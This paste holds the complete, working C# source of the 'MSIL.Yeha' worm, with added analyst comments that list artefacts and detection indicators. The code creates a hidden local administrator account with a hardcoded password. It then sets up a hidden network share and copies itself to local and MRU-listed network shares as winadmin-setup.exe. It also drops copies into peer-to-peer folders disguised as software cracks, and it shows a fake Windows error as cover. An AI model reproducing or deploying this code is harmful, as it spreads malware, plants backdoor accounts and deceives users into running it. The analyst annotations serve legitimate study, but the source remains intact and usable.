FlyFar

MSIL.Yeha - Source Code

Jun 26th, 2023
  1. /*************************************************************
  2.  * C# - MSIL.Yeha
  3.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  4.  * by free0n
  5.  * vx13d.net free0n@vx13d.net
  6.  * ###########################################################
  7.  *
  8.  * Yeha works by first checking itself in the registry
  9.  * if it hasn't run yet it will attempt to create a
  10.  * new hidden local admin user account named Yeha with the
  11.  * password yehawashere. After the account is created
  12.  * it creates a new network share in C:\Yeha and makes the
  13.  * directory as hidden. This is so if someone is browsing
  14.  * the network we might lure them in. Each time the exe
  15.  * is run it will spread to any open network shares that
  16.  * were found in the mru list in the registry. It copies
  17.  * as winadmin-setup.exe.
  18.  *
  19.  * After the share spreading is completed it copies itself
  20.  * to commonly shared p2p folders as cracks for programs
  21.  * found in the program files directory. For example if
  22.  * Trillian directory is found it creates a trillian-crack.exe
  23.  * once the p2p is done it will display a message if the day
  24.  * is the 25th that Yeha has been here; if it's not it
  25.  * displays a common windows error message.
  26.  *
  27.  * Note: This uses the same trick as Snoopy did as
  28.  * it looks like a console application but the output
  29.  * type is windows application so we don't get a dorky
  30.  * cmd window popping up when it's run. Compiled with
  31.  * MS Visual C# express
  32.  *
  33.  * thx RRLF!
  34.  * keep vxing!
  35.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  36.  ************************************************************/
  37. /************************************************************
  38.  * Start of Program.cs
  39.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  40.  ************************************************************/
  41.  
  42. using System;
  43. using System.Collections.Generic;
  44. using System.Text;
  45. using System.Windows.Forms;
  46. using System.IO;
  47.  
  48. namespace Yeha {
  49.  
    /// <summary>
    /// Entry point of the Yeha sample. Wires the steps described in the file header:
    /// first-run setup (<see cref="Yeha.chkIt"/>, <see cref="Yeha.YehaUser"/>,
    /// <see cref="Yeha.CreateShare"/>), then propagation (<see cref="Yeha.Share"/>,
    /// <see cref="Yeha.p2p"/>), then a decoy dialog.
    /// </summary>
    class Program {

        /// <summary>
        /// Runs the infection sequence once per launch.
        /// </summary>
        /// <param name="args">Unused; the sample reads no command-line options.</param>
        /// <remarks>
        /// Analyst note: chkIt() contains no exception handling, so if the HKLM marker
        /// cannot be read or written the exception propagates out of Main before any
        /// of the later steps run. The two propagation calls are unconditional.
        /// </remarks>
        static void Main(string[] args) {

            Yeha yeha = new Yeha();
            // Account creation and the C:\Yeha share are only attempted when the
            // HKLM\SOFTWARE\Yeha marker check reports "not seen before".
            if (!yeha.chkIt()) {
                yeha.YehaUser();
                yeha.CreateShare(@"C:\Yeha", "Yeha");
            }

            // Spreading to local/MRU shares and to p2p folders happens on every run.
            yeha.Share();
            yeha.p2p();

            // Date-gated visible payload: only the day of month is compared, so the
            // "Yeha was here!" box appears on the 25th of any month; every other day the
            // victim sees a fake "Not a valid win32 program" error as cover.
            if (DateTime.Now.Day == 25) {
                MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
            } else {
                MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }
    }
  70. }
  71.  
  72. /************************************************************
  73.  * Start of Yeha.cs
  74.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  75.  ************************************************************/
  76.  
  77. using System;
  78. using System.Text;
  79. using System.IO;
  80. using System.Diagnostics;
  81. using System.DirectoryServices;
  82. using Microsoft.Win32;
  83. using System.Collections;
  84. using System.Collections.Generic;
  85. using System.Management;
  86.  
  87. namespace Yeha {
  88.  
    /// <summary>
    /// Implements the sample's infection marker, backdoor account, share creation and
    /// the two spreading routines. Every routine duplicates the running executable
    /// (<c>me</c>); the file names, registry keys and account name used below are the
    /// host artefacts an analyst can look for.
    /// </summary>
    class Yeha {

        // Full path of the running executable; every File.Copy below copies this file.
        private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);

        /// <summary>
        /// Infection marker check against HKLM\SOFTWARE\Yeha.
        /// </summary>
        /// <returns>
        /// <c>true</c> when value "Yeha" under that key reads as the literal string "Yeha";
        /// otherwise the subkey is created, the value is set to the executable path and
        /// <c>false</c> is returned.
        /// </returns>
        /// <remarks>
        /// Analyst notes: Registry.GetValue returns null when the key is absent, so a clean
        /// host takes the else branch. Note that the value written is the exe path
        /// (<c>me</c>) while the comparison is against the literal "Yeha". Creating a subkey
        /// under HKLM\Software needs write access to HKLM; no exception is caught here.
        /// </remarks>
        public bool chkIt() {
            //checking the registry to see if we have already ran. If
            //we aren't found in the registry we add the value.
            //Hkey local machine is good real estate ;)

            string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
            if (regstr == "Yeha") {
                return true;
            } else {
                // Opens HKLM\Software writable and drops the marker key; the stored
                // value is the path of this executable.
                RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
                RegistryKey newkey = key.CreateSubKey("Yeha");
                newkey.SetValue("Yeha", me);
                return false;
            }
        }

        /// <summary>
        /// Drops copies of the executable into common peer-to-peer shared folders, one per
        /// directory under Program Files, named "&lt;ProgramFilesSubdir&gt;-crack.exe".
        /// </summary>
        /// <remarks>
        /// Artefacts: files matching *-crack.exe in the six folders listed below.
        /// File.Copy is called with overwrite = true and there is no try/catch in this
        /// method, so the first copy failure ends the routine with an exception that
        /// propagates to Main.
        /// </remarks>
        public void p2p() {

            //our p2p spreading is basically just a list of common folders
            //if the folder exists we drop a copies of ourselves as cracks
            //for programs we find the program files folder

            // Candidate drop locations; only those that already exist are used.
            ArrayList arSharedFolders = new ArrayList();
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");

            IEnumerator folder = arSharedFolders.GetEnumerator();
            while (folder.MoveNext()) {
                string tada = Convert.ToString(folder.Current);
                if (Directory.Exists(tada)) {
                    string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
                    foreach (string d in Directory.GetDirectories(progDir)) {
                        // Substring from the last '\' and stripping it yields the leaf
                        // directory name, e.g. "<folder>\<AppDir>-crack.exe".
                        string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
                        File.Copy(me, app, true);
                    }
                }
            }
        }

        /// <summary>
        /// Creates a local user "Yeha" (clear-text password below), adds it to the local
        /// Administrators group through the WinNT ADSI provider, and hides it from the
        /// logon screen via the Winlogon SpecialAccounts\UserList registry value.
        /// </summary>
        /// <remarks>
        /// Both try blocks swallow every exception, so failure is silent.
        /// Detection: local account creation and Administrators membership changes are
        /// auditable security events; a DWORD 0 value naming an account under
        /// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        /// is a well-known hidden-account indicator.
        /// </remarks>
        public void YehaUser() {

            try {

                //create our new admin user account on the local machine we are running on.
                // WinNT://<machine>,computer binds to the local SAM via ADSI.
                DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
                DirectoryEntry usr = ad.Children.Add("Yeha", "user");
                usr.Invoke("SetPassword", new object[] { "yehawashere" });
                usr.CommitChanges();

                // Elevates the new account by adding it to the local Administrators group.
                DirectoryEntry de;
                de = ad.Children.Find("Administrators", "group");
                if (de != null) {
                    de.Invoke("Add", new object[] { usr.Path.ToString() });
                }

                //now we need to make the user hidden from the login screen and the
                //user accounts applet in the control panel to do this we
                //use a reg hack.

                try {
                    string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
                    Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
                } catch (Exception er) { }

            } catch (Exception ex) { }
        }

        /// <summary>
        /// Copies the executable as winadmin-setup.exe into (1) every share on this machine
        /// whose name does not contain '$', enumerated via WMI Win32_Share, and (2) every
        /// path recorded in the current user's "Map Network Drive MRU" list.
        /// </summary>
        /// <remarks>
        /// Artefact: winadmin-setup.exe at the root of local non-hidden shares and of
        /// MRU-mapped network paths. Each phase swallows all exceptions; in phase 2 a
        /// per-path failure is skipped with <c>continue</c>.
        /// </remarks>
        public void Share() {

            //copy ourselves to all the local network shares on the computer
            //this could be good bait when someone connects and wonders what
            //winadmin-setup is.

            try {
                ManagementObjectSearcher shares = new
                ManagementObjectSearcher("select * from win32_share");
                foreach (ManagementObject serv in shares.Get()) {
                    string shareName = Convert.ToString(serv["Name"]);
                    // Names containing '$' (administrative/hidden shares) are skipped.
                    if (!shareName.Contains("$")) {
                        File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
                    }
                }
            } catch (Exception ex) { }

            //now we need to copy ourselves to other shares
            //on the network to do this we check for network shares
            //in the MRU list, we may get lucky we may not

            try {
                string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
                // OpenSubKey returns null when the MRU key is absent; the resulting
                // NullReferenceException is absorbed by the outer catch below.
                RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
                foreach (string valuename in reg.GetValueNames()) {
                    string path = reg.GetValue(valuename).ToString();
                    // "MRUList" holds the ordering, not a path, so it is skipped.
                    if (valuename.ToLower() != "mrulist") {
                        try {
                            // Verbatim string: two backslashes are appended before the file name.
                            File.Copy(me, path + @"\\winadmin-setup.exe", true);
                        } catch (Exception er) {
                            continue;
                        }
                    }
                }
                reg.Close();
            } catch (Exception er) { }
        }

        /// <summary>
        /// Creates <paramref name="dir"/>, publishes it as an SMB share named
        /// <paramref name="name"/> via WMI Win32_Share.Create, and marks the directory
        /// hidden when the create call reports success.
        /// </summary>
        /// <param name="dir">Local directory to create and share (Main passes C:\Yeha).</param>
        /// <param name="name">Share name and description (Main passes "Yeha").</param>
        /// <remarks>
        /// Type 0 is a disk share. Assigning FileAttributes.Hidden replaces the directory's
        /// attribute set rather than adding to it. All exceptions are swallowed.
        /// Artefacts: a hidden directory and a share with the given name; because Share()
        /// enumerates all non-'$' shares afterwards, it also ends up holding winadmin-setup.exe.
        /// </remarks>
        public void CreateShare(string dir, string name) {

            //we create our own shared folder on the network called Yeha
            //this is so if we get a user browsing the network they might
            //open it up and double click winadmin-setup.exe. You know a user
            //might be more susceptible to pick it up if the folder was
            //named pr0n or porn hehehe.

            try {
                Directory.CreateDirectory(dir);
                ManagementClass managementClass = new ManagementClass("Win32_Share");
                ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
                ManagementBaseObject outParams;
                inParams["Description"] = name;
                inParams["Name"] = name;
                inParams["Path"] = dir;
                inParams["Type"] = 0x0;
                outParams = managementClass.InvokeMethod("Create", inParams, null);

                //if the return value was 0 then we know we got the folder created
                //so we are going to make it hidden..
                if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
            //make the dir hidden
                    if (Directory.Exists(dir)) {
                        DirectoryInfo d = new DirectoryInfo(dir);
                        d.Attributes = FileAttributes.Hidden;
                    }
                }

            } catch (Exception e) { }
        }
    }
  234. }